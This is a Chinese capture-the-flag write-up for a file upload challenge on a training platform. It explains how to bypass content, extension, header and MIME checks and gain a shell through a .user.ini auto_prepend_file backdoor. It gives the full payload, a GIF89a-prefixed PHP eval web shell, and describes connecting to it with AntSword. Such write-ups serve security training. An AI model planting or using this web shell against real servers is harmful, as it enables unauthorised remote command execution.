攻防世界-web-ctf-upload

题目场景

查看源码

毫无有效的数据

官方WriteUp

本题需要利用文件上传漏洞点,通过绕过服务器的安全防护,达到getshell的目的

本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行

这里需要绕过的点如下

检查文件内容是否有php字符串

检查后缀中是否有htaccess或ph

检查文件头部信息

文件MIME类型

对于第一点可以利用短标签绕过,例如<?=phpinfo();?>

对于第二点可以通过上传.user.ini以及正常jpg文件来进行getshell,可以参考以下文章

.user.ini文件构成的PHP后门 - phith0n

在服务器中,只要是运用了fastcgi的服务器就能够利用该方式getshell,不论是apache或者ngnix或是其他服务器。

这个文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。

其中很多功能设置了只能php.ini配置,但是还是有一些危险的功能可以被我们控制,比如auto_prepend_file。

第三点绕过方式即在文件头部添加一个图片的文件头,比如GIF89a

第四点绕过方法即修改上传时的Content-Type

因此最终的payload为:

上传.user.ini,内容为

GIF89a

auto_prepend_file=a.jpg

上传a.jpg,内容为

GIF89a

<?=eval($_POST['cmd']);?>

BP抓包

上传.user.ini

再上传a.jpg

F12查看文件去向

蚁剑连接

找到flag

相关推荐
不灭锦鲤5 分钟前
网络安全学习第16集(cdn知识点)
学习·安全
上海云盾第一敬业销售3 小时前
为什么网站需要高防IP?高防IP的优势是什么?
网络·tcp/ip·安全
叙后尘3 小时前
2025年湖北中级注册安全工程师报考那些事
安全
前与端5 小时前
前端XSS常见特征与防范措施
安全
拉法豆粉6 小时前
渗透测试与漏洞扫描有什么区别?
网络·安全·web安全
曹莓可爱多7 小时前
常见CMS
网络·安全·web安全
段嘉许OvO7 小时前
常⻅CMS漏洞
安全
重装小兔19c2577 小时前
vulhub-Thales靶机练习
安全
厦门辰迈智慧科技有限公司8 小时前
山洪灾害监测预警系统主要涵盖
物联网·安全·自动化·监测
汽车功能安全啊13 小时前
利用对称算法及非对称算法实现安全启动
java·开发语言·安全